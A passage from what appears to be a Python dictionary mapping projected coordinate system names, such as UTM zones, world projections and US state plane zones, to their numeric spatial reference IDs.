32613, 'WGS_1984_UTM_Zone_14N': 32614, 'WGS_1984_UTM_Zone_15N': 32615, 'WGS_1984_UTM_Zone_16N': 32616, 'WGS_1984_UTM_Zone_17N': 32617, 'WGS_1984_UTM_Zone_18N': 32618, 'WGS_1984_UTM_Zone_19N': 32619, 'WGS_1984_UTM_Zone_20N': 32620, 'WGS_1984_UTM_Zone_21N': 32621, 'WGS_1984_UTM_Zone_22N': 32622, 'WGS_1984_UTM_Zone_23N': 32623, 'WGS_1984_UTM_Zone_24N': 32624, 'WGS_1984_UTM_Zone_25N': 32625, 'WGS_1984_UTM_Zone_26N': 32626, 'WGS_1984_UTM_Zone_27N': 32627, 'WGS_1984_UTM_Zone_28N': 32628, 'WGS_1984_UTM_Zone_29N': 32629, 'WGS_1984_UTM_Zone_30N': 32630, 'WGS_1984_UTM_Zone_31N': 32631, 'WGS_1984_UTM_Zone_32N': 32632, 'WGS_1984_UTM_Zone_33N': 32633, 'WGS_1984_UTM_Zone_34N': 32634, 'WGS_1984_UTM_Zone_35N': 32635, 'WGS_1984_UTM_Zone_36N': 32636, 'WGS_1984_UTM_Zone_37N': 32637, 'WGS_1984_UTM_Zone_38N': 32638, 'WGS_1984_UTM_Zone_39N': 32639, 'WGS_1984_UTM_Zone_40N': 32640, 'WGS_1984_UTM_Zone_41N': 32641, 'WGS_1984_UTM_Zone_42N': 32642, 
'WGS_1984_UTM_Zone_43N': 32643, 'WGS_1984_UTM_Zone_44N': 32644, 'WGS_1984_UTM_Zone_45N': 32645, 'WGS_1984_UTM_Zone_46N': 32646, 'WGS_1984_UTM_Zone_47N': 32647, 'WGS_1984_UTM_Zone_48N': 32648, 'WGS_1984_UTM_Zone_49N': 32649, 'WGS_1984_UTM_Zone_50N': 32650, 'WGS_1984_UTM_Zone_51N': 32651, 'WGS_1984_UTM_Zone_52N': 32652, 'WGS_1984_UTM_Zone_53N': 32653, 'WGS_1984_UTM_Zone_54N': 32654, 'WGS_1984_UTM_Zone_55N': 32655, 'WGS_1984_UTM_Zone_56N': 32656, 'WGS_1984_UTM_Zone_57N': 32657, 'WGS_1984_UTM_Zone_58N': 32658, 'WGS_1984_UTM_Zone_59N': 32659, 'WGS_1984_UTM_Zone_60N': 32660, 'UPS_North': 32661, 'WGS_1984_Plate_Carree': 32662, 'WGS_1984_BLM_Zone_14N_ftUS': 32664, 'WGS_1984_BLM_Zone_15N_ftUS': 32665, 'WGS_1984_BLM_Zone_16N_ftUS': 32666, 'WGS_1984_BLM_Zone_17N_ftUS': 32667, 'WGS_1984_UTM_Zone_1S': 32701, 'WGS_1984_UTM_Zone_2S': 32702, 'WGS_1984_UTM_Zone_3S': 32703, 'WGS_1984_UTM_Zone_4S': 32704, 'WGS_1984_UTM_Zone_5S': 32705, 'WGS_1984_UTM_Zone_6S': 32706, 'WGS_1984_UTM_Zone_7S': 32707, 'WGS_1984_UTM_Zone_8S': 32708, 'WGS_1984_UTM_Zone_9S': 32709, 'WGS_1984_UTM_Zone_10S': 32710, 'WGS_1984_UTM_Zone_11S': 32711, 'WGS_1984_UTM_Zone_12S': 32712, 'WGS_1984_UTM_Zone_13S': 32713, 'WGS_1984_UTM_Zone_14S': 32714, 'WGS_1984_UTM_Zone_15S': 32715, 'WGS_1984_UTM_Zone_16S': 32716, 'WGS_1984_UTM_Zone_17S': 32717, 'WGS_1984_UTM_Zone_18S': 32718, 'WGS_1984_UTM_Zone_19S': 32719, 'WGS_1984_UTM_Zone_20S': 32720, 'WGS_1984_UTM_Zone_21S': 32721, 'WGS_1984_UTM_Zone_22S': 32722, 'WGS_1984_UTM_Zone_23S': 32723, 'WGS_1984_UTM_Zone_24S': 32724, 'WGS_1984_UTM_Zone_25S': 32725, 'WGS_1984_UTM_Zone_26S': 32726, 'WGS_1984_UTM_Zone_27S': 32727, 'WGS_1984_UTM_Zone_28S': 32728, 'WGS_1984_UTM_Zone_29S': 32729, 'WGS_1984_UTM_Zone_30S': 32730, 'WGS_1984_UTM_Zone_31S': 32731, 'WGS_1984_UTM_Zone_32S': 32732, 'WGS_1984_UTM_Zone_33S': 32733, 'WGS_1984_UTM_Zone_34S': 32734, 'WGS_1984_UTM_Zone_35S': 32735, 'WGS_1984_UTM_Zone_36S': 32736, 'WGS_1984_UTM_Zone_37S': 32737, 'WGS_1984_UTM_Zone_38S': 32738, 
'WGS_1984_UTM_Zone_39S': 32739, 'WGS_1984_UTM_Zone_40S': 32740, 'WGS_1984_UTM_Zone_41S': 32741, 'WGS_1984_UTM_Zone_42S': 32742, 'WGS_1984_UTM_Zone_43S': 32743, 'WGS_1984_UTM_Zone_44S': 32744, 'WGS_1984_UTM_Zone_45S': 32745, 'WGS_1984_UTM_Zone_46S': 32746, 'WGS_1984_UTM_Zone_47S': 32747, 'WGS_1984_UTM_Zone_48S': 32748, 'WGS_1984_UTM_Zone_49S': 32749, 'WGS_1984_UTM_Zone_50S': 32750, 'WGS_1984_UTM_Zone_51S': 32751, 'WGS_1984_UTM_Zone_52S': 32752, 'WGS_1984_UTM_Zone_53S': 32753, 'WGS_1984_UTM_Zone_54S': 32754, 'WGS_1984_UTM_Zone_55S': 32755, 'WGS_1984_UTM_Zone_56S': 32756, 'WGS_1984_UTM_Zone_57S': 32757, 'WGS_1984_UTM_Zone_58S': 32758, 'WGS_1984_UTM_Zone_59S': 32759, 'WGS_1984_UTM_Zone_60S': 32760, 'UPS_South': 32761, 'WGS_1984_TM_36_SE': 32766, 'Sphere_Plate_Carree': 53001, 'Sphere_Equidistant_Cylindrical': 53002, 'Sphere_Miller_Cylindrical': 53003, 'Sphere_Mercator': 53004, 'Sphere_Sinusoidal': 53008, 'Sphere_Mollweide': 53009, 'Sphere_Eckert_VI': 53010, 'Sphere_Eckert_V': 53011, 'Sphere_Eckert_IV': 53012, 'Sphere_Eckert_III': 53013, 'Sphere_Eckert_II': 53014, 'Sphere_Eckert_I': 53015, 'Sphere_Gall_Stereographic': 53016, 'Sphere_Behrmann': 53017, 'Sphere_Winkel_I': 53018, 'Sphere_Winkel_II': 53019, 'Sphere_Polyconic': 53021, 'Sphere_Quartic_Authalic': 53022, 'Sphere_Loximuthal': 53023, 'Sphere_Bonne': 53024, 'Sphere_Hotine': 53025, 'Sphere_Stereographic': 53026, 'Sphere_Equidistant_Conic': 53027, 'Sphere_Cassini': 53028, 'Sphere_Van_der_Grinten_I': 53029, 'Sphere_Robinson': 53030, 'Sphere_Two_Point_Equidistant': 53031, 'Sphere_Azimuthal_Equidistant': 53032, 'Sphere_Cylindrical_Equal_Area': 53034, 'Sphere_Winkel_Tripel_NGS': 53042, 'Sphere_Aitoff': 53043, 'Sphere_Hammer_Aitoff': 53044, 'Sphere_Flat_Polar_Quartic': 53045, 'Sphere_Craster_Parabolic': 53046, 'Sphere_Times': 53048, 'Sphere_Vertical_Perspective': 53049, 'World_Plate_Carree': 54001, 'World_Equidistant_Cylindrical': 54002, 'World_Miller_Cylindrical': 54003, 'World_Mercator': 54004, 'World_Sinusoidal': 54008, 
'World_Mollweide': 54009, 'World_Eckert_VI': 54010, 'World_Eckert_V': 54011, 'World_Eckert_IV': 54012, 'World_Eckert_III': 54013, 'World_Eckert_II': 54014, 'World_Eckert_I': 54015, 'World_Gall_Stereographic': 54016, 'World_Behrmann': 54017, 'World_Winkel_I': 54018, 'World_Winkel_II': 54019, 'World_Polyconic': 54021, 'World_Quartic_Authalic': 54022, 'World_Loximuthal': 54023, 'World_Bonne': 54024, 'World_Hotine': 54025, 'World_Stereographic': 54026, 'World_Equidistant_Conic': 54027, 'World_Cassini': 54028, 'World_Van_der_Grinten_I': 54029, 'World_Robinson': 54030, 'World_Two_Point_Equidistant': 54031, 'World_Azimuthal_Equidistant': 54032, 'World_Cylindrical_Equal_Area': 54034, 'World_Winkel_Tripel_NGS': 54042, 'World_Aitoff': 54043, 'World_Hammer_Aitoff': 54044, 'World_Flat_Polar_Quartic': 54045, 'World_Craster_Parabolic': 54046, 'World_Times': 54048, 'World_Vertical_Perspective': 54049, 'World_Fuller': 54050, 'World_Cube': 54051, 'World_Goode_Homolosine_Land': 54052, 'World_Goode_Homolosine_Ocean': 54053, 'NAD_1927_StatePlane_Guam_FIPS_5400': 65061, 'American_Samoa_1962_StatePlane_American_Samoa_FIPS_5300': 65062, 'NAD_1983_StatePlane_Guam_FIPS_5400': 65161, 'NAD_1983_StatePlane_Kentucky_FIPS_1600': 65163, 'Canada_Albers_Equal_Area_Conic': 102001, 'Canada_Lambert_Conformal_Conic': 102002, 'USA_Contiguous_Albers_Equal_Area_Conic': 102003, 'USA_Contiguous_Lambert_Conformal_Conic': 102004, 'USA_Contiguous_Equidistant_Conic': 102005, 'NAD_1983_Alaska_Albers': 102006, 'Hawaii_Albers_Equal_Area_Conic': 102007, 'North_America_Albers_Equal_Area_Conic': 102008, 'North_America_Lambert_Conformal_Conic': 102009, 'North_America_Equidistant_Conic': 102010, 'Africa_Sinusoidal': 102011, 'Asia_Lambert_Conformal_Conic': 102012, 'Europe_Albers_Equal_Area_Conic': 102013, 'Europe_Lambert_Conformal_Conic': 102014, 'South_America_Lambert_Conformal_Conic': 102015, 'North_Pole_Azimuthal_Equidistant': 102016, 'North_Pole_Lambert_Azimuthal_Equal_Area': 102017, 'North_Pole_Stereographic': 
102018, 'South_Pole_Azimuthal_Equidistant': 102019, 'South_Pole_Lambert_Azimuthal_Equal_Area': 102020, 'South_Pole_Stereographic': 102021, 'Africa_Albers_Equal_Area_Conic': 102022, 'Africa_Equidistant_Conic': 102023, 'Africa_Lambert_Conformal_Conic': 102024, 'Asia_North_Albers_Equal_Area_Conic': 102025, 'Asia_North_Equidistant_Conic': 102026, 'Asia_North_Lambert_Conformal_Conic': 102027, 'Asia_South_Albers_Equal_Area_Conic': 102028, 'Asia_South_Equidistant_Conic': 102029, 'Asia_South_Lambert_Conformal_Conic': 102030, 'Europe_Equidistant_Conic': 102031, 'South_America_Equidistant_Conic': 102032, 'South_America_Albers_Equal_Area_Conic': 102033, 'North_Pole_Gnomonic': 102034, 'North_Pole_Orthographic': 102035, 'South_Pole_Gnomonic': 102036, 'South_Pole_Orthographic': 102037, 'The_World_From_Space': 102038, 'USA_Contiguous_Albers_Equal_Area_Conic_USGS_version': 102039, 'D48_Slovenia_TM': 102060, 'Everest_Modified_1969_RSO_Malaya_Meters': 102061, 'Kertau_RSO_Malaya_Meters': 102062, 'Kandawala_Ceylon_Belt_Meters': 102063, 'Kandawala_Ceylon_Belt_Indian_Yards_1937': 102064, 'S-JTSK_Krovak': 102065, 'S-JTSK_Ferro_Krovak_East_North': 102066, 'S-JTSK_Krovak_East_North': 102067, 'EMEP_50_Kilometer_Grid': 102068, 'EMEP_150_Kilometer_Grid': 102069, 'Guernsey_Grid': 102070, 'AGD_1966_ACT_Grid_AGC_Zone': 102071, 'AGD_1966_ISG_54_2': 102072, 'AGD_1966_ISG_54_3': 102073, 'AGD_1966_ISG_55_1': 102074, 'AGD_1966_ISG_55_2': 102075, 'AGD_1966_ISG_55_3': 102076, 'AGD_1966_ISG_56_1': 102077, 'AGD_1966_ISG_56_2': 102078, 'AGD_1966_ISG_56_3': 102079, 'Bermuda_2000_National_Grid': 102090, 'Monte_Mario_Italy_1': 102091, 'Monte_Mario_Italy_2': 102092, 'Roma_1940_Gauss_Boaga_Est': 102093, 'Roma_1940_Gauss_Boaga_Ovest': 102094, 'JAD_2001_Jamaica_Grid': 102095, 'Bab_South_Palau_Azimuthal_Equidistant': 102096, 'ETRS_1989_UTM_Zone_26N': 102097, 'ETRS_1989_UTM_Zone_27N': 102098, 'ETRS_1989_UTM_Zone_39N': 102099, 'WGS_1984_Web_Mercator_Auxiliary_Sphere': 102100, 'NGO_1948_Norway_Zone_1': 102101, 
'NGO_1948_Norway_Zone_2': 102102, 'NGO_1948_Norway_Zone_3': 102103, 'NGO_1948_Norway_Zone_4': 102104, 'NGO_1948_Norway_Zone_5': 102105, 'NGO_1948_Norway_Zone_6': 102106, 'NGO_1948_Norway_Zone_7': 102107, 'NGO_1948_Norway_Zone_8': 102108, 'ETRS_1989_Slovenia_TM': 102109, 'RGF_1993_Lambert_93': 102110, 'Chatham_Islands_1979_Map_Grid': 102111, 'NZGD_2000_Chatham_Island_Circuit': 102112, 'WGS_1984_Web_Mercator': 102113, 'Old_Hawaiian_UTM_Zone_4N': 102114, 'Old_Hawaiian_UTM_Zone_5N': 102115, 'American_Samoa_1962_UTM_Zone_2S': 102116, 'NAD_1927_Alaska_Albers_Meters': 102117, 'NAD_1927_Georgia_Statewide_Albers': 102118, 'NAD_1927_Texas_Statewide_Mapping_System': 102119, 'NAD_1927_Michigan_GeoRef_Feet_US': 102120, 'NAD_1983_Michigan_GeoRef_Feet_US': 102121, 'NAD_1927_Michigan_GeoRef_Meters': 102122, 'NAD_1983_Michigan_GeoRef_Meters': 102123, 'NAD_1927_UTM_Zone_1N': 102124, 'NAD_1927_UTM_Zone_2N': 102125, 'NAD_1927_UTM_Zone_59N': 102126, 'NAD_1927_UTM_Zone_60N': 102127, 'NAD_1983_UTM_Zone_1N': 102128, 'NAD_1983_UTM_Zone_2N': 102129, 'NAD_1983_UTM_Zone_59N': 102130, 'NAD_1983_UTM_Zone_60N': 102131, 'NGO_1948_UTM_Zone_32N': 102132, 'NGO_1948_UTM_Zone_33N': 102133, 'NGO_1948_UTM_Zone_34N': 102134, 'NGO_1948_UTM_Zone_35N': 102135, 'NGO_1948_Baerum_Kommune': 102136, 'NGO_1948_Bergenhalvoen': 102137, 'NGO_1948_Oslo_Kommune': 102138, 'EUREF_FIN_TM35FIN': 102139, 'Hong_Kong_1980_Grid': 102140, 'Hong_Kong_1980_UTM_Zone_49N': 102141, 'Hong_Kong_1980_UTM_Zone_50N': 102142, 'QND_1995_UTM_39N': 102143, 'Merchich_Degree_UTM_Zone_28N': 102144, 'JGD_2000_UTM_Zone_51N': 102145, 'JGD_2000_UTM_Zone_52N': 102146, 'JGD_2000_UTM_Zone_53N': 102147, 'JGD_2000_UTM_Zone_54N': 102148, 'JGD_2000_UTM_Zone_55N': 102149, 'JGD_2000_UTM_Zone_56N': 102150, 'Tokyo_UTM_Zone_51N': 102151, 'Tokyo_UTM_Zone_52N': 102152, 'Tokyo_UTM_Zone_53N': 102153, 'Tokyo_UTM_Zone_54N': 102154, 'Tokyo_UTM_Zone_55N': 102155, 'Tokyo_UTM_Zone_56N': 102156, 'ETRS_1989_Kosovo_Grid': 102157, 'Jordan_JTM': 102158, 
'Observatorio_Meteorologico_1965_Macau_Grid': 102159, 'Datum_73_Hayford_Gauss_IGeoE': 102160, 'Datum_73_Hayford_Gauss_IPCC': 102161, 'Graciosa_Base_SW_1948_UTM_Zone_26N': 102162, 'Lisboa_Bessel_Bonne': 102163, 'Lisboa_Hayford_Gauss_IGeoE': 102164, 'Lisboa_Hayford_Gauss_IPCC': 102165, 'Observ_Meteorologico_1939_UTM_Zone_25N': 102166, 'Porto_Santo_1936_UTM_Zone_28N': 102167, 'Sao_Braz_UTM_Zone_26N': 102168, 'Selvagem_Grande_1938_UTM_Zone_28N': 102169, 'AGD_1966_VICGRID': 102170, 'GDA_1994_VICGRID94': 102171, 'GDA_1994_South_Australia_Lambert': 102172, 'ETRS_1989_UWPP_1992': 102173, 'ETRS_1989_UWPP_2000_PAS_5': 102174, 'ETRS_1989_UWPP_2000_PAS_6': 102175, 'ETRS_1989_UWPP_2000_PAS_7': 102176, 'ETRS_1989_UWPP_2000_PAS_8': 102177, 'NAD_1927_10TM_AEP_Forest': 102178, 'NAD_1927_10TM_AEP_Resource': 102179, 'NAD_1927_3TM_111': 102180, 'NAD_1927_3TM_114': 102181, 'NAD_1927_3TM_117': 102182, 'NAD_1927_3TM_120': 102183, 'NAD_1983_10TM_AEP_Forest': 102184, 'NAD_1983_10TM_AEP_Resource': 102185, 'NAD_1983_3TM_111': 102186, 'NAD_1983_3TM_114': 102187, 'NAD_1983_3TM_117': 102188, 'NAD_1983_3TM_120': 102189, 'NAD_1983_BC_Environment_Albers': 102190, 'Nord_Maroc_Degree': 102191, 'Sud_Maroc_Degree': 102192, 'Sahara_Degree': 102193, 'UWPP_1992': 102194, 'UWPP_2000_PAS_5': 102195, 'UWPP_2000_PAS_6': 102196, 'UWPP_2000_PAS_7': 102197, 'UWPP_2000_PAS_8': 102198, 'Belge_Lambert_2008': 102199, 'NAD_1983_HARN_UTM_Zone_2S': 102200, 'NAD_1983_HARN_Guam_Map_Grid': 102201, 'NAD_1983_HARN_UTM_Zone_4N': 102202, 'NAD_1983_HARN_UTM_Zone_5N': 102203, 'NAD_1983_HARN_UTM_Zone_11N': 102205, 'NAD_1983_HARN_UTM_Zone_12N': 102206, 'NAD_1983_HARN_UTM_Zone_13N': 102207, 'NAD_1983_HARN_Maine_2000_East_Zone': 102208, 'NAD_1983_HARN_Maine_2000_Central_Zone': 102209, 'NAD_1983_HARN_Maine_2000_West_Zone': 102210, 'NAD_1983_HARN_UTM_Zone_18N': 102211, 'NAD_1983_USFS_R6_Albers': 102218, 'NAD_1983_Wisconsin_TM_US_Ft': 102219, 'NAD_1983_HARN_Wisconsin_TM_US_Ft': 102220, 'Ocotepeque_1935_Costa_Rica_Lambert_Norte': 
102221, 'Ocotepeque_1935_Costa_Rica_Lambert_Sur': 102222, 'WGS_1984_Costa_Rica_TM_90': 102223, 'MONREF_1997_UTM_Zone_46N': 102224, 'MONREF_1997_UTM_Zone_47N': 102225, 'MONREF_1997_UTM_Zone_48N': 102226, 'MONREF_1997_UTM_Zone_49N': 102227, 'MONREF_1997_UTM_Zone_50N': 102228, 'NAD_1983_HARN_StatePlane_Alabama_East_FIPS_0101': 102229, 'NAD_1983_HARN_StatePlane_Alabama_West_FIPS_0102': 102230, 'Colombia_West_West_Zone': 102231, 'Bogota_Ciudad_Bogota': 102232, 'MAGNA_Ciudad_Bogota': 102233, 'NAD_1983_CSRS_UTM_Zone_14N': 102234, 'NAD_1983_CSRS_UTM_Zone_15N': 102235, 'NAD_1983_CSRS_UTM_Zone_16N': 102236, 'Pohnpei_Az_Eq_1971': 102237, 'Saipan_Az_Eq_1969': 102238, 'Guam_Geodetic_Triangulation_Network_1963': 102239, 'Guam_Geodetic_Network_1993': 102240, 'NAD_1983_HARN_StatePlane_California_I_FIPS_0401': 102241, 'NAD_1983_HARN_StatePlane_California_II_FIPS_0402': 102242, 'NAD_1983_HARN_StatePlane_California_III_FIPS_0403': 102243, 'NAD_1983_HARN_StatePlane_California_IV_FIPS_0404': 102244, 'NAD_1983_HARN_StatePlane_California_V_FIPS_0405': 102245, 'NAD_1983_HARN_StatePlane_California_VI_FIPS_0406': 102246, 'NAD_1983_HARN_StatePlane_Arizona_East_FIPS_0201': 102248, 'NAD_1983_HARN_StatePlane_Arizona_Central_FIPS_0202': 102249, 'NAD_1983_HARN_StatePlane_Arizona_West_FIPS_0203': 102250, 'NAD_1983_HARN_StatePlane_Arkansas_North_FIPS_0301': 102251, 'NAD_1983_HARN_StatePlane_Arkansas_South_FIPS_0302': 102252, 'NAD_1983_HARN_StatePlane_Colorado_North_FIPS_0501': 102253, 'NAD_1983_HARN_StatePlane_Colorado_Central_FIPS_0502': 102254, 'NAD_1983_HARN_StatePlane_Colorado_South_FIPS_0503': 102255, 'NAD_1983_HARN_StatePlane_Connecticut_FIPS_0600': 102256, 'NAD_1983_HARN_StatePlane_Delaware_FIPS_0700': 102257, 'NAD_1983_HARN_StatePlane_Florida_East_FIPS_0901': 102258, 'NAD_1983_HARN_StatePlane_Florida_West_FIPS_0902': 102259, 'NAD_1983_HARN_StatePlane_Florida_North_FIPS_0903': 102260, 'NAD_1983_HARN_StatePlane_Hawaii_1_FIPS_5101': 102261, 'NAD_1983_HARN_StatePlane_Hawaii_2_FIPS_5102': 
102262, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103': 102263, 'NAD_1983_HARN_StatePlane_Hawaii_4_FIPS_5104': 102264, 'NAD_1983_HARN_StatePlane_Hawaii_5_FIPS_5105': 102265, 'NAD_1983_HARN_StatePlane_Georgia_East_FIPS_1001': 102266, 'NAD_1983_HARN_StatePlane_Georgia_West_FIPS_1002': 102267, 'NAD_1983_HARN_StatePlane_Idaho_East_FIPS_1101': 102268, 'NAD_1983_HARN_StatePlane_Idaho_Central_FIPS_1102': 102269, 'NAD_1983_HARN_StatePlane_Idaho_West_FIPS_1103': 102270, 'NAD_1983_HARN_StatePlane_Illinois_East_FIPS_1201': 102271, 'NAD_1983_HARN_StatePlane_Illinois_West_FIPS_1202': 102272, 'NAD_1983_HARN_StatePlane_Indiana_East_FIPS_1301': 102273, 'NAD_1983_HARN_StatePlane_Indiana_West_FIPS_1302': 102274, 'NAD_1983_HARN_StatePlane_Iowa_North_FIPS_1401': 102275, 'NAD_1983_HARN_StatePlane_Iowa_South_FIPS_1402': 102276, 'NAD_1983_HARN_StatePlane_Kansas_North_FIPS_1501': 102277, 'NAD_1983_HARN_StatePlane_Kansas_South_FIPS_1502': 102278, 'NAD_1983_HARN_StatePlane_Kentucky_North_FIPS_1601': 102279, 'NAD_1983_HARN_StatePlane_Kentucky_South_FIPS_1602': 102280, 'NAD_1983_HARN_StatePlane_Louisiana_North_FIPS_1701': 102281, 'NAD_1983_HARN_StatePlane_Louisiana_South_FIPS_1702': 102282, 'NAD_1983_HARN_StatePlane_Maine_East_FIPS_1801': 102283, 'NAD_1983_HARN_StatePlane_Maine_West_FIPS_1802': 102284, 'NAD_1983_HARN_StatePlane_Maryland_FIPS_1900': 102285, 'NAD_1983_HARN_StatePlane_Massachusetts_Mainland_FIPS_2001': 102286, 'NAD_1983_HARN_StatePlane_Massachusetts_Island_FIPS_2002': 102287, 'NAD_1983_HARN_StatePlane_Michigan_North_FIPS_2111': 102288, 'NAD_1983_HARN_StatePlane_Michigan_Central_FIPS_2112': 102289, 'NAD_1983_HARN_StatePlane_Michigan_South_FIPS_2113': 102290, 'NAD_1983_HARN_StatePlane_Minnesota_North_FIPS_2201': 102291, 'NAD_1983_HARN_StatePlane_Minnesota_Central_FIPS_2202': 102292, 'NAD_1983_HARN_StatePlane_Minnesota_South_FIPS_2203': 102293, 'NAD_1983_HARN_StatePlane_Mississippi_East_FIPS_2301': 102294, 'NAD_1983_HARN_StatePlane_Mississippi_West_FIPS_2302': 102295, 
'NAD_1983_HARN_StatePlane_Missouri_East_FIPS_2401': 102296, 'NAD_1983_HARN_StatePlane_Missouri_Central_FIPS_2402': 102297, 'NAD_1983_HARN_StatePlane_Missouri_West_FIPS_2403': 102298, 'NAD_1983_HARN_StatePlane_Montana_FIPS_2500': 102300, 'NAD_1983_HARN_StatePlane_Nebraska_FIPS_2600': 102304, 'NAD_1983_HARN_StatePlane_Nevada_East_FIPS_2701': 102307, 'NAD_1983_HARN_StatePlane_Nevada_Central_FIPS_2702': 102308, 'NAD_1983_HARN_StatePlane_Nevada_West_FIPS_2703': 102309, 'NAD_1983_HARN_StatePlane_New_Hampshire_FIPS_2800': 102310, 'NAD_1983_HARN_StatePlane_New_Jersey_FIPS_2900': 102311, 'NAD_1983_HARN_StatePlane_New_Mexico_East_FIPS_3001': 102312, 'NAD_1983_HARN_StatePlane_New_Mexico_Central_FIPS_3002': 102313, 'NAD_1983_HARN_StatePlane_New_Mexico_West_FIPS_3003': 102314, 'NAD_1983_HARN_StatePlane_New_York_East_FIPS_3101': 102315, 'NAD_1983_HARN_StatePlane_New_York_Central_FIPS_3102': 102316, 'NAD_1983_HARN_StatePlane_New_York_West_FIPS_3103': 102317, 'NAD_1983_HARN_StatePlane_New_York_Long_Island_FIPS_3104': 102318, 'NAD_1983_HARN_StatePlane_North_Dakota_North_FIPS_3301': 102320, 'NAD_1983_HARN_StatePlane_North_Dakota_South_FIPS_3302': 102321, 'NAD_1983_HARN_StatePlane_Ohio_North_FIPS_3401': 102322, 'NAD_1983_HARN_StatePlane_Ohio_South_FIPS_3402': 102323, 'NAD_1983_HARN_StatePlane_Oklahoma_North_FIPS_3501': 102324, 'NAD_1983_HARN_StatePlane_Oklahoma_South_FIPS_3502': 102325, 'NAD_1983_HARN_StatePlane_Oregon_North_FIPS_3601': 102326, 'NAD_1983_HARN_StatePlane_Oregon_South_FIPS_3602': 102327, 'NAD_1983_HARN_StatePlane_Rhode_Island_FIPS_3800': 102330, 'NAD_1983_HARN_StatePlane_South_Dakota_North_FIPS_4001': 102334, 'NAD_1983_HARN_StatePlane_South_Dakota_South_FIPS_4002': 102335, 'NAD_1983_HARN_StatePlane_Tennessee_FIPS_4100': 102336, 'NAD_1983_HARN_StatePlane_Texas_North_FIPS_4201': 102337, 'NAD_1983_HARN_StatePlane_Texas_North_Central_FIPS_4202': 102338, 'NAD_1983_HARN_StatePlane_Texas_Central_FIPS_4203': 102339, 'NAD_1983_HARN_StatePlane_Texas_South_Central_FIPS_4204': 
102340, 'NAD_1983_HARN_StatePlane_Texas_South_FIPS_4205': 102341, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301': 102342, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302': 102343, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303': 102344, 'NAD_1983_HARN_StatePlane_Vermont_FIPS_4400': 102345, 'NAD_1983_HARN_StatePlane_Virginia_North_FIPS_4501': 102346, 'NAD_1983_HARN_StatePlane_Virginia_South_FIPS_4502': 102347, 'NAD_1983_HARN_StatePlane_Washington_North_FIPS_4601': 102348, 'NAD_1983_HARN_StatePlane_Washington_South_FIPS_4602': 102349, 'NAD_1983_HARN_StatePlane_West_Virginia_North_FIPS_4701': 102350, 'NAD_1983_HARN_StatePlane_West_Virginia_South_FIPS_4702': 102351, 'NAD_1983_HARN_StatePlane_Wisconsin_North_FIPS_4801': 102352, 'NAD_1983_HARN_StatePlane_Wisconsin_Central_FIPS_4802': 102353, 'NAD_1983_HARN_StatePlane_Wisconsin_South_FIPS_4803': 102354, 'NAD_1983_HARN_StatePlane_Wyoming_East_FIPS_4901': 102355, 'NAD_1983_HARN_StatePlane_Wyoming_East_Central_FIPS_4902': 102356, 'NAD_1983_HARN_StatePlane_Wyoming_West_Central_FIPS_4903': 102357, 'NAD_1983_HARN_StatePlane_Wyoming_West_FIPS_4904': 102358, 'NAD_1983_HARN_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200': 102361, 'NAD_1983_HARN_StatePlane_Kentucky_FIPS_1600': 102363, 'WGS_1984_ARC_System_Zone_01': 102421, 'WGS_1984_ARC_System_Zone_02': 102422, 'WGS_1984_ARC_System_Zone_03': 102423, 'WGS_1984_ARC_System_Zone_04': 102424, 'WGS_1984_ARC_System_Zone_05': 102425, 'WGS_1984_ARC_System_Zone_06': 102426, 'WGS_1984_ARC_System_Zone_07': 102427, 'WGS_1984_ARC_System_Zone_08': 102428, 'WGS_1984_ARC_System_Zone_09': 102429, 'WGS_1984_ARC_System_Zone_10': 102430, 'WGS_1984_ARC_System_Zone_11': 102431, 'WGS_1984_ARC_System_Zone_12': 102432, 'WGS_1984_ARC_System_Zone_13': 102433, 'WGS_1984_ARC_System_Zone_14': 102434, 'WGS_1984_ARC_System_Zone_15': 102435, 'WGS_1984_ARC_System_Zone_16': 102436, 'WGS_1984_ARC_System_Zone_17': 102437, 'WGS_1984_ARC_System_Zone_18': 102438, 'LKS_1992_Latvia_TM_0': 102440, 'TWD_1967_TM_Taiwan': 
102441, 'TWD_1967_TM_Penghu': 102442, 'TWD_1997_TM_Taiwan': 102443, 'TWD_1997_TM_Penghu': 102444, 'NAD_1983_HARN_StatePlane_Hawaii_1_FIPS_5101_Feet': 102461, 'NAD_1983_HARN_StatePlane_Hawaii_2_FIPS_5102_Feet': 102462, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103_Feet': 102463, 'NAD_1983_HARN_StatePlane_Hawaii_4_FIPS_5104_Feet': 102464, 'NAD_1983_HARN_StatePlane_Hawaii_5_FIPS_5105_Feet': 102465, 'NAD_1983_HARN_StatePlane_Minnesota_North_FIPS_2201_Feet': 102466, 'NAD_1983_HARN_StatePlane_Minnesota_Central_FIPS_2202_Feet': 102467, 'NAD_1983_HARN_StatePlane_Minnesota_South_FIPS_2203_Feet': 102468, 'NAD_1983_HARN_Mississippi_TM': 102469, 'Nord_Algerie_Ancienne_Degree': 102491, 'Sud_Algerie_Ancienne_Degree': 102492, 'WGS_1984_Complex_UTM_Zone_20N': 102570, 'WGS_1984_Complex_UTM_Zone_21N': 102571, 'WGS_1984_Complex_UTM_Zone_22N': 102572, 'WGS_1984_Complex_UTM_Zone_23N': 102573, 'WGS_1984_Complex_UTM_Zone_24N': 102574, 'WGS_1984_Complex_UTM_Zone_25N': 102575, 'WGS_1984_Complex_UTM_Zone_26N': 102576, 'WGS_1984_Complex_UTM_Zone_27N': 102577, 'WGS_1984_Complex_UTM_Zone_28N': 102578, 'WGS_1984_Complex_UTM_Zone_29N': 102579, 'WGS_1984_Complex_UTM_Zone_30N': 102580, 'NTF_France_I_degrees': 102581, 'NTF_France_II_degrees': 102582, 'NTF_France_III_degrees': 102583, 'NTF_France_IV_degrees': 102584, 'Nord_Algerie_Degree': 102591, 'Sud_Algerie_Degree': 102592, 'NAD_1983_Texas_Centric_Mapping_System_Albers': 102601, 'NAD_1983_Texas_Centric_Mapping_System_Lambert': 102602, 'NAD_1983_Texas_Statewide_Mapping_System': 102603, 'NAD_1983_Georgia_Statewide_Lambert': 102604, 'NAD_1983_Idaho_TM': 102605, 'NAD_1983_Maine_2000_East_Zone': 102606, 'NAD_1983_Maine_2000_Central_Zone': 102607, 'NAD_1983_Maine_2000_West_Zone': 102608, 'NAD_1983_Mississippi_TM': 102609, 'NAD_1983_StatePlane_Alabama_East_FIPS_0101_Feet': 102629, 